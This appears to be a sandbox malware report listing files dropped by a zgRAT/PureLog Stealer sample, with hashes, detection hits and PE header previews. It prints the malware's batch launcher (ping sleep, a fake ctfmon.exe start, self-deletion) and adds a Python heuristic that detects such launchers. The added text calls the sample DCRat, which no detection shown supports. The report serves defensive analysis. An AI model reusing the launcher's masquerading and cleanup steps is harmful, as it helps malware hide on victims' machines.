                                                  SHA-512:4DD3C99D5DB38904E56132B2370BC19D9DE7FB5F37A4394CFBF3ED35618B8AF16817DE2635E099467B8D1EAB31B6FDFE96A24A209F6A340357B058897CB0492C
                                                  Malicious:false
                                                  Preview:yYcoAwgcBzaWov05olq1eVH99GuqsRMskods4QiCeeLoBPhAJsVJxX8cQdo3C0ttmsvARHAXCoWAKd8titgA5C4MpBbblp9nvbBSdhsCr8HJB8Sxf5USUsykxjUQpivWosPsbpQAAdS75vLrso6qVqTCnbf4NcWJMveStjWzpTS0a0pCXniBmFB7YMFAJVxiGJvKQ37IRGBCYdlwvdgk4VgGtg3geVpTfttQFfvepZtfE9j5lTOqzNovmoat9bo6argouVqQrB5elACu785LH9dSF7nbFCfNuxEWc4LPm79yRJJmlpvBgdzbONiwrPLpgrty6qSCwpiJ9pA6yBzZQerR8nHPWZiXwUSkZVq5XtO05pciMm7pZvYB9c0TiCqXHKXpXahcV4ChP0WSKiCub28A5Qk7eWWUC0tvSxLwEfUft1vJFiI9966OLXtHzj78hseZHl9XXQp6hdREeb16OWUG4ej5DE7fhV7A
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe, Author: Joe Security
                                                  Antivirus:
                                                   • Antivirus: Avira, Detection: 100%
                                                   • Antivirus: Joe Sandbox ML, Detection: 100%
                                                   • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with very long lines (617), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):617
                                                  Entropy (8bit):5.877421259663639
                                                  Encrypted:false
                                                  SSDEEP:12:ufDKTRRL/farQ6XnRdqjaWvMIIvsl41YIn5CE/51zcUY2M2:ufwRL8n7krt5eYoMY1ze4
                                                  MD5:E2897BBFC8EF4D5763F1357E07F4F8E7
                                                  SHA1:C05C81A6553A076A7D58BA3217D6D4111B2A6584
                                                  SHA-256:2B4DC77692B5CF6796E5B8D1A7C0B96D4B35DC8E15447CB840B5381E24A927ED
                                                  SHA-512:AC3FF6E6A7E20C9526E0C7F56D6D0DC1998D648CFA877DAFCC0A001269EE42313199A932431343BBB4D0A01176C7A3A00918EA23E028BAFF1ACC24FC71320EAA
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Yara Hits:
                                                   • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, Author: Joe Security
                                                   • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):194
                                                  Entropy (8bit):5.668032049459092
                                                  Encrypted:false
                                                  SSDEEP:3:wU7tCHCidsBIdPA7UdKRS4D4TAysOZrVjV+K3gW23QPesQHe69zAJ3XiQywRc2fx:wU7t3idVDdKzUoa23QWx+6Rqd1S75ytX
                                                  MD5:3C5A604B3CE3A2A2A37B337A6C539C37
                                                  SHA1:B2BA452CB2249A2614B5B93E510DA21B4925E262
                                                  SHA-256:95C08984F5D330DAE34FC53AE4E6873ED1C0296C7ACE427F3C25E7070C854470
                                                  SHA-512:2AC373E537F1ED12C2816E391702A3079AC3DB5B073E3FD83B6B59561D6B8F1B42329058C66161F3EFDF69DFE4C4E32C9C2B0334FA8867187DE8850F0A0F5F66
                                                  Malicious:false
                                                  Preview:JHQjqXl8qUHNMG4xmBPjXfsDCuC0H4DXbWJZalmvm3JixIiqfSeawqxoZMg6Uu0wRuw07fWAZe6eWJQ4MWVyZmkuif9OFpa2CXRCWrsA6eBStTSP6lu7YBWpKBRcfI5tDEb82OienV25lRAONuRd5ddBAl2UZQeyiRPp2TXsDPTDJbE2ACPv0cxkla7RVOEX0D
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with very long lines (620), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):620
                                                  Entropy (8bit):5.88627203484711
                                                  Encrypted:false
                                                  SSDEEP:12:PDGooMIVyfixp65SOMV07DxkIyE1/w4Uv5V8YD5bLaJVDx+cZlVol4Fuxjda:PjVuy6/Iku1/LU5Vf5bLCzlVol3j0
                                                  MD5:DAD2B147F98BFC19F8D9F57C5579592A
                                                  SHA1:C147D75CBB53BD2245230F12B6AA65D15F25D26D
                                                  SHA-256:E09EAE22EDC592BFA2E66CAD71D8C15AFBBE628E1AE2C683357848F8BF4317D7
                                                  SHA-512:80133538AA33A47E62E07868C598E5147186C19E69B291EB9CF835A743D321DC87067B0F888238B6FC4E97418F4C221D6DA0E61CE1548C2586A0775FCDC0BD93
                                                  Malicious:false
                                                  Preview:
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1698
                                                  Entropy (8bit):5.367720686892084
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                  MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                  SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                  SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                  SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4515328
                                                  Entropy (8bit):7.193302330489937
                                                  Encrypted:false
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  MD5:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  SHA1:A6B5EB9800EA4FEF6DA44D306D743941143D87EA
                                                  SHA-256:21922A6CC19A72509D69FB830853A1E7E3AF5B3E44134DA7D1B65C3EE78F6037
                                                  SHA-512:78C5F18762A688557EB4994E6685481B3883E6C0DCC27C7ABB05B7FE524BED24E949EF5AE2B91B9DA6332B26D14B1AB1ABD35961235D2D4EE6B8663E0849FE87
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text....};.. ...~;................. ..`.rsrc...p.....;.......;.............@....reloc........;.......;.............@..B.................;.....H...........h.......j...H....0.7.;......................................0..........(.... ........8........E........\...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{y...:....& ....8....*....0.......... ........8........E............G...........w...8....r...ps....z*~....(I... .... .... ....s....~....(M....... ....8........~....(Q...~....(U... ....<.... ........8h...8.... ....~....{....:S...& ....8H......... ....~....{....9....& ....8#...~....
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):150
                                                  Entropy (8bit):5.164152792577076
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7VD70EovBktKcKZG1t+kiE2J5xAIPLqn:hCRLuVFOOr+DE7VGvKOZG1wkn23fun
                                                  MD5:8E093EB5C8C8FCD7426F29587314CBAA
                                                  SHA1:C001C8DC21A005F5090858814ACCB42D23DA32FC
                                                  SHA-256:11263886A2406D68C866309D04B5C2F05F5C5A06E1D72D4336AE9C6D1FF1568C
                                                  SHA-512:93AD2D7D349ACBDDE043EF8B4B95F4C9D57958279D1208C803D17C0D2B819C5927B084DB91C469F6610DC07A725211E40ED01050ADF2CEA264F4185F7D04BBCD
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\ctfmon.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KgQDHOJvgq.bat"
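The batch file above is the one human-readable script this sample drops, and it packs three of the behaviours flagged in the report's signatures into five lines: `ping -n 10 localhost > nul` as a sleep, a `start` of a binary named like a system process (`ctfmon.exe`) outside the Windows directory, and self-deletion of the `.bat`. As an added example that is not part of the Joe Sandbox report and is not DCRat's own code, the following Python heuristic parses a launcher script of this shape and returns those traits so an analyst can triage dropped `.bat` files in bulk. The regular expressions, the `SYSTEM_BINARIES` list, the approximate sleep computation and the `is_dropper_launcher` verdict are my assumptions; the batch text is reconstructed from the preview, in which the sandbox renders each CR/LF as `..`.

```python
import re

# Constructed input: the batch file preview shown in the report above, with the
# CR/LF pairs that the sandbox renders as ".." restored by hand.
DROPPED_BAT = (
    '@echo off\r\n'
    'chcp 65001\r\n'
    'ping -n 10 localhost > nul\r\n'
    'start "" "C:\\Recovery\\ctfmon.exe"\r\n'
    'del /a /q /f "C:\\Users\\user\\AppData\\Local\\Temp\\\\KgQDHOJvgq.bat"\r\n'
)

# Assumed list of Windows binaries that legitimately live only under the
# Windows directory; a copy anywhere else is a masquerading candidate.
SYSTEM_BINARIES = {"ctfmon.exe", "svchost.exe", "lsass.exe", "csrss.exe",
                   "dllhost.exe", "explorer.exe", "winlogon.exe"}
EXPECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\")

# ping -n N <loopback> ... > nul : the classic cmd.exe "sleep"
PING_SLEEP = re.compile(
    r'^\s*ping(?:\.exe)?\s+(?:-n\s+(\d+)\s+)?(?:localhost|127\.0\.0\.1|::1)\b.*?>\s*nul',
    re.IGNORECASE)
# start "" "<path>" : launch a program with an empty window title
START_CMD = re.compile(r'^\s*start\s+""\s+"([^"]+)"', re.IGNORECASE)
# del ... <name>.bat : the script deleting a batch file (usually itself)
DEL_BAT = re.compile(r'^\s*del\b.*?([^"\s\\]+\.bat)"?\s*$', re.IGNORECASE)


def analyze_launcher_bat(text):
    """Return the launcher traits found in a dropped batch script."""
    findings = {"ping_sleep_seconds": None, "launches": [],
                "masquerading": [], "deletes_bat": None}
    for line in text.splitlines():
        m = PING_SLEEP.match(line)
        if m:
            # -n N sends N echo requests about one second apart, so the
            # script blocks for roughly N-1 seconds (ping's default N is 4).
            count = int(m.group(1) or 4)
            findings["ping_sleep_seconds"] = max(count - 1, 0)
            continue
        m = START_CMD.match(line)
        if m:
            path = m.group(1)
            findings["launches"].append(path)
            low = path.lower()
            name = low.rsplit("\\", 1)[-1]
            # System-process name started from a non-Windows directory
            if name in SYSTEM_BINARIES and not low.startswith(EXPECTED_DIRS):
                findings["masquerading"].append(path)
            continue
        m = DEL_BAT.match(line)
        if m:
            findings["deletes_bat"] = m.group(1)
    return findings


def is_dropper_launcher(findings):
    """Heuristic verdict: the script starts something and either delays
    first (ping sleep) or removes a .bat afterwards (cleanup)."""
    return bool(findings["launches"]) and (
        findings["ping_sleep_seconds"] is not None
        or findings["deletes_bat"] is not None)


if __name__ == "__main__":
    result = analyze_launcher_bat(DROPPED_BAT)
    print(result)
    print("launcher pattern:", is_dropper_launcher(result))
```

Run against the reconstructed script it reports a sleep of about 9 seconds, one launch of `C:\Recovery\ctfmon.exe` flagged as masquerading, and deletion of `KgQDHOJvgq.bat`. The sleep and self-delete are cheap to vary, so the `start` of a system-process name from an unexpected directory is the trait worth weighting highest when this heuristic is turned into a detection.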
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.323856189774724
                                                  Encrypted:false
                                                  SSDEEP:3:H8q8PS/jJWddH5X:H8KbkDJ
                                                  MD5:C20040FF05F03E462B7D04256F998FF3
                                                  SHA1:1C65BABAA30F90D1806867DC7BF554ABFD82DBFD
                                                  SHA-256:60F7FB060408C760F55C1F1D06339A5647FD265FD27C0ED219999529A9809FB0
                                                  SHA-512:4D332777BDD4A9910725C505AFFBC51D1D628F741A116CA4141B16CCE995E1E466631417E1A8319DA2D3A9F1F24D330651249D10F7C76DA795BC5ED835DBC13C
                                                  Malicious:false
                                                  Preview:5B1YOYjwvzV2VlAz8yI4D3ZQ2
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Joe Sandbox View:
                                                  • Filename: OisrvsB6Ea.exe, Detection: malicious
                                                  • Filename: 3XtEci4Mmo.exe, Detection: malicious
                                                  • Filename: HaLCYOFjMN.exe, Detection: malicious
                                                  • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious
                                                  • Filename: aW6kSsgdvv.exe, Detection: malicious
                                                  • Filename: HMhdtzxEHf.exe, Detection: malicious
                                                  • Filename: kJrNOFEGbQ.exe, Detection: malicious
                                                  • Filename: lEwK4xROgV.exe, Detection: malicious
                                                  • Filename: zZ1Y43bxxV.exe, Detection: malicious
                                                  • Filename: VqGD18ELBM.exe, Detection: malicious
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):294912
                                                  Entropy (8bit):6.010605469502259
                                                  Encrypted:false
                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33280
                                                  Entropy (8bit):5.634433516692816
                                                  Encrypted:false
                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
